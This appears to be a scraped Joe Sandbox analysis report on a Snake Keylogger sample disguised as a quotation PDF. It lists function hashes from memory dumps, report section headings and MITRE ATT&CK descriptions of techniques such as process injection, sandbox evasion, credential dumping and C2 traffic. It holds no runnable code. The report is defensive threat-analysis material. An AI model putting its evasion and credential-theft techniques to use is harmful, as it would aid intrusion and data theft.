Opcode ID: c8a227d33ea37420cc29234ef249ef7c476a89f0444289c5969dad25c1e6397b
Instruction ID: 73662d8c25a8d87dcad9c737f865e52f4255286d1a42ef246dfcadd2a112f0c9
Opcode Fuzzy Hash: c8a227d33ea37420cc29234ef249ef7c476a89f0444289c5969dad25c1e6397b
Instruction Fuzzy Hash: 6BF03134D19A0E4BEB69DF54C851BDDB3B0EF04304F10016DD429971A0DB346A46CB40

Function 00007FFD9B8891D0 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2922803075.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9b880000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f5434dffa6c795350dca6f617611b5b3f635f272ff22ca26d001b02fec324431
Instruction ID: 9b66e8ff288a8cc8ffd6e2c0d3799dd5c8d536c90a8a10f7023ce2010368c25b
Opcode Fuzzy Hash: f5434dffa6c795350dca6f617611b5b3f635f272ff22ca26d001b02fec324431
Instruction Fuzzy Hash: 72F08CB09195989FC71ADBB49869AD9BBF0EF0A300F0401DDD444AB1A2C7386886CB40

Function 00007FFD9B881391 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2922803075.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9b880000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 286cf3bcb4ad462b438b3ed231ef266026904af594d5bce103bc9a01d6fefe3e
Instruction ID: a86f4237dc06e264d3064c0359a965a3b714bf64c8fd0cf77f44cc8fb9d78138
Opcode Fuzzy Hash: 286cf3bcb4ad462b438b3ed231ef266026904af594d5bce103bc9a01d6fefe3e
Instruction Fuzzy Hash: D3F074709159599FDB91EB68C898A9DBBB1EF69301F1544DAC44DE7121CA345A818B00

Function 00007FFD9B881328 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2922803075.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9b880000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 11577c4320e5a04a007d3f95f331f1b02cf0002a0b478526ce256d805b706efc
Instruction ID: 85cef435c31ab5422dedfdb35869ae387ce074a007fe433ccc272bc92eabf13c
Opcode Fuzzy Hash: 11577c4320e5a04a007d3f95f331f1b02cf0002a0b478526ce256d805b706efc
Instruction Fuzzy Hash: FFF09870945A599FDB91EB68C858AD9BBF5FF69301F1500D9C04DD7211CB34AD81CF00

Function 00007FFD9B8812BF Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2922803075.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9b880000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a1f742fd422b1a0979c00c8b7aaec3823c99cb2ed22fa55b83f2d4b3553924e3
Instruction ID: 4b6482e5625a7ded6dad9271ac4df789b84294163691d5f3dff73d4541ef6428
Opcode Fuzzy Hash: a1f742fd422b1a0979c00c8b7aaec3823c99cb2ed22fa55b83f2d4b3553924e3
Instruction Fuzzy Hash: D4F0AC70A0695D9FDB91EF68C8A9AEABBF1EF5A301F1500D9C04DD7111CA345D81CF00

Function 00007FFD9B88111B Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2922803075.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9b880000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ca2325d60b63e99714186efe3ddad994c2647c2fa009e0a7453e43e68e9e197
Instruction ID: d6a737eecc4cd741094d64bf6cd08bf83a0e49028b1b92727251517a811fc2e0
Opcode Fuzzy Hash: 5ca2325d60b63e99714186efe3ddad994c2647c2fa009e0a7453e43e68e9e197
Instruction Fuzzy Hash: 99F0157090595D8FCB91EB688899AE9BBF1EF2C310F0140DA804DD7221DA38AEC1CF00

Function 00007FFD9B8810B2 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2922803075.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9b880000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eaac0c81e4e571f7d26f4ab277ecb3817a37161ebb87b468927510e01c06b415
Instruction ID: 107bb5b7dd7a94657e73f69904fe8ad3fe65470ba12a9e19fe7ed7b3d8a8924a
Opcode Fuzzy Hash: eaac0c81e4e571f7d26f4ab277ecb3817a37161ebb87b468927510e01c06b415
Instruction Fuzzy Hash: 75F01C7094495E8FCBA0EB688859BE9BBF1EF68300F0140E9C09DDB121DA745DC1DF00

Function 00007FFD9B88BF50 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2922803075.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9b880000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ba7b412208eda86b2a72799a5c474ea1811166ec1876a39f13b9f57cc4458f24
Instruction ID: e388e22323bd8c611f8cb7959add3f303dfcff95c64c5f282afa6c087f55a031
Opcode Fuzzy Hash: ba7b412208eda86b2a72799a5c474ea1811166ec1876a39f13b9f57cc4458f24
Instruction Fuzzy Hash: F6E01A7091998C5FCB94EFA88865BA9BBF1EF59200F0441E9844DD7266CA3869C68B44

Function 00007FFD9B881056 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2922803075.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9b880000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01346d04bf2adeaaaa6a23ce46d3572be995f8bfa065bfd6b9bd3f0232bc8160
Instruction ID: 4ab0d1efdfeff4d42a712041291bb4bcf7a1858ec71462804641ab00eeaeb381
Opcode Fuzzy Hash: 01346d04bf2adeaaaa6a23ce46d3572be995f8bfa065bfd6b9bd3f0232bc8160
Instruction Fuzzy Hash: 1AE01A7090599D9FDB90EBB8C899FA97BF0EF19201F0484DAC04EE7221CA7859C5CF00

Function 00007FFD9B88B7BB Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2922803075.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9b880000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 98df0298002fc1a1052b240d631447712a5db656ed1da2ecdca74daa8da41934
Instruction ID: 85e9c2877be7930e1e6f4131b38be309fa0337d9e6b3193528ea3ed628054ca0
Opcode Fuzzy Hash: 98df0298002fc1a1052b240d631447712a5db656ed1da2ecdca74daa8da41934
Instruction Fuzzy Hash: 98E01A70A0589C8FC791EF388C287EABBF0EF59201F0441DA804CEB256CA341D868B00

Function 00007FFD9B8815E1 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2922803075.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9b880000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 59b954df2c36c2081e67d3168b55091263fb4abefeb09296f20ce16c6ee609f3
Instruction ID: 0470d901d7d81fca510d542b12ed4d23ea8bf36e6d8ae7ff5732d185c648e9fa
Opcode Fuzzy Hash: 59b954df2c36c2081e67d3168b55091263fb4abefeb09296f20ce16c6ee609f3
Instruction Fuzzy Hash: 68D0126065AD9E5FD291EBA844749667FE09F4D201B1405F9904DCB1B2CD3865869B00

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report QUOTATION_JULQTRA071244#U00b7PDF.scr.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Snake Keylogger

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Networking

System Summary

Snort Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Network Behavior

Suricata IDS Alerts

Network Port Distribution

TCP Packets

Windows Analysis Report
QUOTATION_JULQTRA071244#U00b7PDF.scr.exe

Function 000001375093FB7A Relevance: 2.9, APIs: 2, Instructions: 382
memoryCOMMON

Function 00007FFD9BC1CA09 Relevance: 1.6, APIs: 1, Instructions: 144
nativeCOMMON

Function 000001375093EAE2 Relevance: 6.1, APIs: 4, Instructions: 133
memoryCOMMON

Function 000001375093EB51 Relevance: 6.1, APIs: 4, Instructions: 89
memoryCOMMON

Function 0000013750941392 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 104
libraryCOMMON

Function 000001375093EC0E Relevance: 3.1, APIs: 2, Instructions: 63
memoryCOMMON

Function 00007FFD9BAE14A9 Relevance: 2.4, Strings: 1, Instructions: 1174
COMMON

Function 00007FFD9BC1BDFD Relevance: 2.0, APIs: 1, Instructions: 454
COMMON

Function 00007FFD9BC1BE69 Relevance: 2.0, APIs: 1, Instructions: 453
processCOMMON

Function 00007FFD9BC1CDC9 Relevance: 1.7, APIs: 1, Instructions: 210
injectionCOMMON

Function 00007FFD9BC1D6F9 Relevance: 1.7, APIs: 1, Instructions: 185
COMMON

Function 00007FFD9BC1CBB9 Relevance: 1.7, APIs: 1, Instructions: 184
memoryCOMMON

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre